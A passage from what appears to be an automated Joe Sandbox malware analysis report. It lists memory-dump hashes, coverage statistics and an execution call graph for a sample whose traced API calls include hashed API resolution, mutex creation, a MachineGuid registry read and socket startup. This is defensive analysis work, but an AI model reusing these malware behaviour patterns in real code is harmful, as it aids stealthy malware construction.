                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
                                                                      • Instruction ID: 03c992a4348eac45ac72be90a8f484c26676ca76a0b44247905b8b03d1444a50
                                                                      • Opcode Fuzzy Hash: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
                                                                      • Instruction Fuzzy Hash: 5721C2B5604240EFDB16CF14F9C0B26BBA5FB84314F24C5A9E8494B256C736D84ACB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                      • Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
                                                                      • Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                      • Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da8908087fa036cfb4662122d7e0595f03acf75d3fdf741a43f9a119e529df9e
                                                                      • Instruction ID: aaa28b7f392200f8a71f84af523e22275354315c58b7c6e9ef10bd5d347ad013
                                                                      • Opcode Fuzzy Hash: da8908087fa036cfb4662122d7e0595f03acf75d3fdf741a43f9a119e529df9e
                                                                      • Instruction Fuzzy Hash: 43212334E09218CFEB60CF64C890BECBBB6BB49300F20909AD40DA7252C7355E86DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                      • Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
                                                                      • Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                      • Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d40b90a77221328b48a2268ec89e677db94d74da1d50063631a7567e3c27aef
                                                                      • Instruction ID: e64a8c1fa63fa4a92234564f394fb0b7fe0a8210de77e2e982c8ec96c9148812
                                                                      • Opcode Fuzzy Hash: 7d40b90a77221328b48a2268ec89e677db94d74da1d50063631a7567e3c27aef
                                                                      • Instruction Fuzzy Hash: 64118C70A45218DFEB60CF54CC80BEDB7B8AB19300F6480EAD54EA7281CBB45AC5DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction ID: 67c540baf6bac1ad4bbaa40799964805698ccef35c79b973d5445efff56ac4c6
                                                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction Fuzzy Hash: AE119D75904280DFDB12CF14E5C4B16FFA1FB84314F28C6ADD8494B656C33AD85ACBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16136ae1cd7fdcd11885db866d9257f4138747396bbf34985dd533787d5a5df3
                                                                      • Instruction ID: 0a59b7bf07c597e03ba5c43bc94f5ccf76a6757abd35b60fc3e549936a6799f3
                                                                      • Opcode Fuzzy Hash: 16136ae1cd7fdcd11885db866d9257f4138747396bbf34985dd533787d5a5df3
                                                                      • Instruction Fuzzy Hash: EF1105B8D04209DFCB44DFA9D8556AEBBF5BF89300F2090AAC919A3305E7345B41DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: acb82c64e3bd211dfc3698f1a566779a691a59fa4cfc053c369635303a1d1762
                                                                      • Instruction ID: 33904b7333c9175db9d02e15d0337a1bb8f36968ea6994750b744d2152694cc3
                                                                      • Opcode Fuzzy Hash: acb82c64e3bd211dfc3698f1a566779a691a59fa4cfc053c369635303a1d1762
                                                                      • Instruction Fuzzy Hash: 2A112975A45218DFEB60CF54CC80BECB7B8AB19300F64909AE54DA7281C7B49AC5DF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3af8cc4b40f8fc807402b2fb5cce783107f483bb9b180507a903aab2bcbc1098
                                                                      • Instruction ID: 14ec585d00919a92dbf14256dcda2c7dba2210c1955cc014bac668082eb6b60b
                                                                      • Opcode Fuzzy Hash: 3af8cc4b40f8fc807402b2fb5cce783107f483bb9b180507a903aab2bcbc1098
                                                                      • Instruction Fuzzy Hash: B7112774908228CFDB60DF64C895BECBBB4AB0A311F1449D9D00DAB292C7388EC9CF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9cdab949b55843e2528cf989bd35f12d3088ef32c6bde4829261a70e00edfc30
                                                                      • Instruction ID: fc9561a2626fc2bc80e15cbd0b850491fe7d99e5946bafc41c1facb6468b195c
                                                                      • Opcode Fuzzy Hash: 9cdab949b55843e2528cf989bd35f12d3088ef32c6bde4829261a70e00edfc30
                                                                      • Instruction Fuzzy Hash: 7F014F75A44218DFEB20CF50CC81BECB7B8AB19300F24809AE50DA7281C7745AC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e135f80a5234cc77c46636c04c03a40c59bb6fa0bf7f43f178d6979e4f93fb57
                                                                      • Instruction ID: 8864b785bb78a582efe1b4bdbebcd7f4bdad5b25cfc567b68f5fc067bfcd41ec
                                                                      • Opcode Fuzzy Hash: e135f80a5234cc77c46636c04c03a40c59bb6fa0bf7f43f178d6979e4f93fb57
                                                                      • Instruction Fuzzy Hash: 67014C74E092548FDB51CF64CC94ADDBBB5BF4A304F2440EAD909AB246C3325A41DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e5585fb6f5a5d0fafdabf5d77b5280ecb42de4d8b920b2b8d13e3cb56fd2853
                                                                      • Instruction ID: fc538d12078c3d35b1da0b0203beafbd9de296086a7f099722cdd3f1e2544fba
                                                                      • Opcode Fuzzy Hash: 6e5585fb6f5a5d0fafdabf5d77b5280ecb42de4d8b920b2b8d13e3cb56fd2853
                                                                      • Instruction Fuzzy Hash: 1A013C35906228CFDF60CFA0CD40BEDBBB5EF59305F6850DA904DA7262C2359A86DF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71d4c480bd031ce089c98df3f2ff4ec81adba229f5ecd7005cb0718245376d30
                                                                      • Instruction ID: 33ee8223953e7ac3c3a634863f888586744a85e26e912dbbce775422e6b71c89
                                                                      • Opcode Fuzzy Hash: 71d4c480bd031ce089c98df3f2ff4ec81adba229f5ecd7005cb0718245376d30
                                                                      • Instruction Fuzzy Hash: C5F0F4B4E00209DFDB40DFB9C940AAEFBF5AB49300F1495AAC818E3311EB359A01DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86eabc558f395c795a701a9699c4f2db3093f386afbe1a4cae00ef111b9c5f4c
                                                                      • Instruction ID: e0de721ed48344e2cf3fca0825e2d66abbcb1483bac2608b3e1c81dfe9012540
                                                                      • Opcode Fuzzy Hash: 86eabc558f395c795a701a9699c4f2db3093f386afbe1a4cae00ef111b9c5f4c
                                                                      • Instruction Fuzzy Hash: 8301A935918394CFD710CB14C855AECBBB4BF06321F1881D6881E972D3D7344945CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0fb6a3678e8528f13c2e3a86d9b5081ef27767d1fd57895729925473f20f406
                                                                      • Instruction ID: 4dac1b4aed7ce42063860c4d2d07f32cb99685be3bb2b9fa96a58bb62dfa04b6
                                                                      • Opcode Fuzzy Hash: e0fb6a3678e8528f13c2e3a86d9b5081ef27767d1fd57895729925473f20f406
                                                                      • Instruction Fuzzy Hash: EF01AF75940228DFEBA0DF54C891BD8B7B4AB09311F5485D9D60CA3241DB399FC5DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 76cd2a1dca863ee597df0322fc0a603e5e4a7e525b7b26d46ebb77f97ad1f476
                                                                      • Instruction ID: e13024664bf5450a9997ad05a783d0947e694a0d6e5befae8403a3b141934ece
                                                                      • Opcode Fuzzy Hash: 76cd2a1dca863ee597df0322fc0a603e5e4a7e525b7b26d46ebb77f97ad1f476
                                                                      • Instruction Fuzzy Hash: E3F03070D04208DFDF00DFA5E9546AEBBB8AB4A301F1091A6C409A3252D7341A45EF88

                                                                      Execution Graph

                                                                      Execution Coverage:2.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:1.3%
                                                                      Total number of Nodes:299
                                                                      Total number of Limit Nodes:12
                                                                      execution_graph 8940 408952 8961 40823f 8940->8961 8943 408960 8945 4056bf 2 API calls 8943->8945 8946 40896a 8945->8946 8989 408862 8946->8989 8948 4089c4 8949 413aca 4 API calls 8948->8949 8950 4089d4 8949->8950 8952 405695 2 API calls 8950->8952 8951 408975 8951->8948 8997 4087d6 8951->8997 8954 4089df 8952->8954 8959 402bab 2 API calls 8960 40899d 8959->8960 8960->8948 8960->8959 8962 40824d 8961->8962 8963 40831b 8962->8963 8964 4031e5 3 API calls 8962->8964 8963->8943 8977 4083bb 8963->8977 8965 40826d 8964->8965 8966 4031e5 3 API calls 8965->8966 8967 408289 8966->8967 8968 4031e5 3 API calls 8967->8968 8969 4082a5 8968->8969 8970 4031e5 3 API calls 8969->8970 8971 4082c1 8970->8971 8972 4031e5 3 API calls 8971->8972 8973 4082e2 8972->8973 8974 4031e5 3 API calls 8973->8974 8975 4082ff 8974->8975 8976 4031e5 3 API calls 8975->8976 8976->8963 9025 408363 8977->9025 8980 4084ab 8980->8943 8981 4056bf 2 API calls 8986 4083f4 8981->8986 8982 408492 8983 413aca 4 API calls 8982->8983 8984 4084a0 8983->8984 8985 405695 2 API calls 8984->8985 8985->8980 8986->8982 9028 40815d 8986->9028 9043 40805d 8986->9043 9058 404b8f 8989->9058 8991 40887e 8992 4031e5 3 API calls 8991->8992 8993 40893e 8991->8993 8995 408946 8991->8995 8996 402b7c 2 API calls 8991->8996 8992->8991 9061 404a39 8993->9061 8995->8951 8996->8991 8998 402b7c 2 API calls 8997->8998 8999 4087e7 8998->8999 9000 4031e5 3 API calls 8999->9000 9002 40885a 8999->9002 9004 408802 9000->9004 9001 402bab 2 API calls 9001->9002 9009 408749 9002->9009 9005 40884d 9004->9005 9008 408853 9004->9008 9070 408522 9004->9070 9074 4084b4 9004->9074 9077 4084d4 9005->9077 9008->9001 9010 404b8f 3 API calls 9009->9010 9011 408765 9010->9011 9012 4031e5 3 API calls 9011->9012 9013 408522 3 API calls 9011->9013 9014 4087c7 9011->9014 9016 4087cf 9011->9016 9012->9011 9013->9011 9015 404a39 4 API calls 9014->9015 9015->9016 9017 4085d1 9016->9017 9018 4086c2 9017->9018 9021 4085e9 9017->9021 9018->8960 9020 402bab 2 API calls 9020->9021 9021->9018 9021->9020 9022 4031e5 3 API calls 9021->9022 9083 4089e6 9021->9083 9102 4086c9 9021->9102 9106 4036a3 9021->9106 9022->9021 9026 4031e5 3 API calls 9025->9026 9027 408386 9026->9027 9027->8980 9027->8981 9029 40816f 9028->9029 9030 4081b6 9029->9030 9031 4081fd 9029->9031 9042 4081ef 9029->9042 9033 405872 4 API calls 9030->9033 9032 405872 4 API calls 9031->9032 9034 408213 9032->9034 9035 4081cf 9033->9035 9036 405872 4 API calls 9034->9036 9037 405872 4 API calls 9035->9037 9038 408222 9036->9038 9039 4081df 9037->9039 9040 405872 4 API calls 9038->9040 9041 405872 4 API calls 9039->9041 9040->9042 9041->9042 9042->8986 9044 40808c 9043->9044 9045 4080d2 9044->9045 9046 408119 9044->9046 9057 40810b 9044->9057 9047 405872 4 API calls 9045->9047 9048 405872 4 API calls 9046->9048 9049 4080eb 9047->9049 9050 40812f 9048->9050 9051 405872 4 API calls 9049->9051 9052 405872 4 API calls 9050->9052 9053 4080fb 9051->9053 9054 40813e 9052->9054 9055 405872 4 API calls 9053->9055 9056 405872 4 API calls 9054->9056 9055->9057 9056->9057 9057->8986 9064 404a19 9058->9064 9067 4049ff 9061->9067 9063 404a44 9063->8995 9065 4031e5 3 API calls 9064->9065 9066 404a2c 9065->9066 9066->8991 9068 4031e5 3 API calls 9067->9068 9069 404a12 RegCloseKey 9068->9069 9069->9063 9071 408534 9070->9071 9073 4085af 9071->9073 9080 4084ee 9071->9080 9073->9004 9075 4031e5 3 API calls 9074->9075 9076 4084c7 9075->9076 9076->9004 9078 4031e5 3 API calls 9077->9078 9079 4084e7 9078->9079 9079->9008 9081 4031e5 3 API calls 9080->9081 9082 408501 9081->9082 9082->9073 9084 4031e5 3 API calls 9083->9084 9085 408a06 9084->9085 9086 4031e5 3 API calls 9085->9086 9090 408b21 9085->9090 9089 408a32 9086->9089 9087 408b17 9118 403649 9087->9118 9089->9087 9109 403666 9089->9109 9090->9021 9093 408b0e 9115 40362f 9093->9115 9095 4031e5 3 API calls 9096 408a88 9095->9096 9096->9093 9097 4031e5 3 API calls 9096->9097 9098 408ac4 9097->9098 9099 405b6f 5 API calls 9098->9099 9100 408aff 9099->9100 9100->9093 9112 408508 9100->9112 9103 4086e2 9102->9103 9105 408744 9102->9105 9104 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9103->9104 9103->9105 9104->9103 9105->9021 9107 4031e5 3 API calls 9106->9107 9108 4036b5 9107->9108 9108->9021 9110 4031e5 3 API calls 9109->9110 9111 403679 9110->9111 9111->9093 9111->9095 9113 4031e5 3 API calls 9112->9113 9114 40851b 9113->9114 9114->9093 9116 4031e5 3 API calls 9115->9116 9117 403642 9116->9117 9117->9087 9119 4031e5 3 API calls 9118->9119 9120 40365c 9119->9120 9120->9090 8060 402c1f 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 402c31 LoadLibraryW 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8101 4139de 8110 413855 8101->8110 8103 4139f1 8104 413838 GetProcessHeap HeapAlloc GetPEB 8103->8104 8107 4139f7 8104->8107 8105 413866 21 API calls 8106 413a2d 8105->8106 8108 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8106->8108 8107->8105 8109 413a34 8108->8109 8111 4031e5 3 API calls 8110->8111 8112 413864 8111->8112 8112->8112 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                      • GetLastError.KERNEL32 ref: 0041399E
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Error$CreateLastModeMutex
                                                                      • String ID:
                                                                      • API String ID: 3448925889-0
                                                                      • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                      • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                        • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                      • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$AllocOpenProcessQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3676486918-0
                                                                      • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                      • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 82 404df3-404e16 WSAStartup
                                                                      APIs
                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                      • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNELBASE(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                                                      Memory Dump Source
